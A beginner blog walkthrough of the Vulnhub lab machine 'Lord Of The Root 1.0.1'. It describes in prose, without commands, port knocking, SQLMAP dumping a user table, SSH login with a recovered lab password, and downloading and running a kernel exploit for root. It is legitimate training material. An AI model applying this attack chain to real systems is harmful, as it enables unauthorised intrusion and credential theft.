Lord Of The Root: 1.0.1 Vulnhub Walkthrough

Hello Everyone, in this blog i am going to post walkthrough of Lord Of The Root 1.0.1.

This machine is for beginners

Let’s Start,

Target IP- 192.168.43.159

Attacker IP- 192.168.43.139

let’s scan target IP

There is only 1 port open.

22- ssh

I tried connecting to ssh.

I tried few default passwords but it didn’t work.

When you see it carefully, The banner says “knock Friend To Enter” and under that it says “Easy as 1,2,3”.

Later, I got to know that there is something called “Port Knocking“.

Click Here, To know about Port Knocking.

So, Let’s knock ports 1,2,3.

Let’s scan the target again,

Ok, Now we can see 1 more port got opened and a Website is running on it.

1337- http

It’s an image, I checked page source but i didn’t find anything.

So, I did Nikto

I found a directory /images/ .

So, we got image files.

I checked every file but didn’t get anything.

Thought of checking /robots.txt.

It has an image.

I checked page source, and i found BASE64 encoded string .

I deocoded it twice.

So, we got a directory /978345210/index.php .

we got a login page, tried few usernames and passwords but i couldn’t login.

I used SQLMAP.

So, There 4 databases available.

Next, I checked Tables in Webapp Database.

we got the table Users.

Let’s check for columns.

We got id,password and username.

Let’s dump them.

Ok, we got some usernames and password .

i tried to login in webpage But failed.

As ssh is running i tried to login.

Only one username and password worked i.e

smeagol:MyPreciousR00t

I got the shell.

Now, i checked for the Linux version.

I checked if any exploit available for that Version and found it.

I downloaded the exploit in my kali and started HTTP server.

After this i moved into the tmp folder in the shell and downloaded the exploit using wget.

Compiled and executed it.

here, I got ROOT!!!

Writer: Anudeep is Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.